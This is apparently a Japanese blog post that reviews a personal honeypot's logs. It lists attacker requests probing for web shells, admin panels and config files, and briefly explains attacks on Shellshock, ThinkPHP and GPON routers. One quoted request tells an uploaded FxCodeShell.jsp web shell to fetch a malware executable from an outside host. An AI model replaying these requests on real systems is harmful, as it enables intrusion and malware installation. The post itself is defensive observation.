ハニーポットログ観察3-1
- 今回は4/26から平成最後の30日分のログを観察していきたいと思います。 最近gw明けでまとめる気がおきず、引きずってました。 明日から本気出します。 基本的にアクセス先を列挙していきます。
また、今度からフィールド内の内容や、ポートを明記します。失礼しました。
アクセス先
GET http://httpheader[.]net/ GET /cgi-bin/authLogin.cgi GET /TP/public/index.php GET /robots.txt GET /sitemap.xml GET /.well-known/security.txt GET /manager/html GET /webdav/ GET /.env GET /help.php GET /java.php GET /_query.php GET /db_pma.php GET /db_cts.php GET /test.php GET /logon.php GET /help-e.php GET /license.php GET /log.php GET /hell.php GET /pmd_online.php GET /x.php GET /htdocs.php GET /shell.php GET /desktop.ini.php GET /z.php GET /lala.php GET /lala-dpr.php GET /wpc.php GET /wpo.php GET /t6nv.php GET /muhstik.php GET /text.php GET /wp-config.php GET /muhstik.php GET /muhstik2.php GET /muhstiks.php GET /muhstik-dpr.php GET /lol.php GET /uploader.php GET /cmd.php GET /cmv.php GET /cmdd.php GET /App3199c780.php GET /admin/assets/js/views/login.js GET /favicon.ico GET /index.php // 他にもディレクトリを指定して沢山 (/../index.php) GET //webfig/ GET /Lists/admin.php GET /db/ GET /admin/ GET /pma/ GET /myadmin/ GET /phpmyadmin/ GET /dbadmin/ GET /backup/ GET /phpMyAdmin/ GET /admin-scripts.asp GET /nx8j78af1b.jsp GET ttp://api[.]ipify.org/ GET ttp://www[.]ip.cn/ GET /Lists/admin.php GET /jmx-console POST /tmUnblock.cgi POST /TP/public/index.php?s=captcha POST /mybestloves.php POST /GponForm/diag_Form?images/ PUT /FxCodeShell.jsp%20 PUT /FxCodeShell.jsp::$DATA GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=ttp://fid[.]hognoob.se/download.exe CONNECT www.netflix.com:443 CONNECT www.google.com:443 CONNECT www.baidu.com:443 CONNECT www.instagram.com:443 CONNECT 133[.]130[.]126[.]119:43 //ip先自体は無害っぽい OPTIONS / PROPFIND /
考察
今回は5日分あるので、多めですね。 なのでいままで観測の無かったものを上げていって、簡単に内容をまとめ、考察していきます。 今回は長々となりそうですが、ご愛敬ください(笑)。 また、気になったモノなどを挙げていきます。
1.GET /cgi-bin/authLogin.cgi
shellshockというBash脆弱性を突いたNASシステムへの攻撃 https://www.fireeye.jp/company/press-releases/2014/the-shellshock-aftershock-for-nas-administrators.html
2.GET /TP/public/index.php
ThinkPHPの脆弱性を狙った攻撃 https://www.orangeitems.com/entry/2018/12/24/000500
3.GET /.well-known/security.txt
/well-known はドメインの存在確認(認証)を行うためにNTTPC側で自動作成するディレクトリらしい その中のsecurity.txtを取得しようと攻撃しているのかも https://faq.nttpc.co.jp/faq/show/13553?site_domain=suitex
4.GET /webdav/
webdavの調査 https://ja.wikipedia.org/wiki/WebDAV
5GET ./admin/assets/js/views/login.js
Free PBXの調査
6.GET /App3199c780.php,
謎 調査次第更新します。
7.GET /nx8j78af1b.jsp
JavaServer Pagesファイルの調査
8.GET jmx-console
jmx-consoleの調査だと思われる。 ※jmx-console JBossによって開発されたメッセージング・プラットフォーム(JBoss Messaging) https://www.atmarkit.co.jp/ait/articles/1001/08/news121_2.html
9.POST /TP/public/index.php?s=captcha
ThinkPHPの脆弱性を狙った攻撃
10.POST /GponForm/diag_Form?images/
GPON Home Routerの脆弱性を狙った攻撃 https://www.kccs.co.jp/secureowl/column/column10003.html
11.PUT /FxCodeShell.jsp%20
FxCodeShell.jspをPUTしてサーバーへアップロード↓ https://www.morihi-soc.net/?p=811
12.GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=ttp://fid[.]hognoob.se/download.exe
PUTでFxCodeShell.jspをアップロード後、マルウェアをダウンロードし攻撃
13.その他CONNECT系
Webサイトの不正利用や踏み台に利用 https://www.morihi-soc.net/?p=392
感想
今回も雑な書き方になってしました。(沢山の参考にさせていただいたサイト様ありがとうございます。) 前よりも様々な攻撃が来るようになった気がします。一日の総アクセス数も1万近いです。
個人的に気になったことは、FxCodeShellの部分です。 これは中身を詳しく調べてこれだけで記事を書いてみたいと思いました。 特にあまり書くこともないので、本日はこのくらいにしておきます。
